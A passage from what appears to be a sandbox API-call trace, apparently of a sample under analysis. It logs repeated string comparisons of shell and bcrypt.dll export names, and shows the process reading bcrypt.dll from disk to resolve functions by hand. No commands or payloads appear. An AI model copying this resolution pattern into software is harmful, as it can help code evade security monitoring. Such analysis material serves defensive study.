lpString2="CheckEscapesW") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0276.868] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0276.869] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0276.869] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0276.870] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0276.871] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0277.024] GetProcessHeap () returned 0x470000 [0277.024] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c6040 | out: hHeap=0x470000) returned 1 [0277.440] GetProcessHeap () returned 0x470000 [0277.440] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489240 [0277.441] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0277.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0277.448] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0277.449] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0277.449] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0277.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0277.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0277.450] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0277.450] GetProcessHeap () returned 0x470000 [0277.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x26fa0) returned 0x2d02010 [0277.451] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0277.452] ReadFile (in: hFile=0x15c, lpBuffer=0x2d02010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0277.455] CloseHandle (hObject=0x15c) returned 1 [0277.455] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0277.455] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0277.455] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0277.455] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0277.456] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0277.456] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0277.456] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0277.456] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0277.457] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0277.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0277.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0277.459] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.459] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0277.460] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0277.460] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0277.571] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0277.572] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0277.573] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0277.573] lstrcmpA 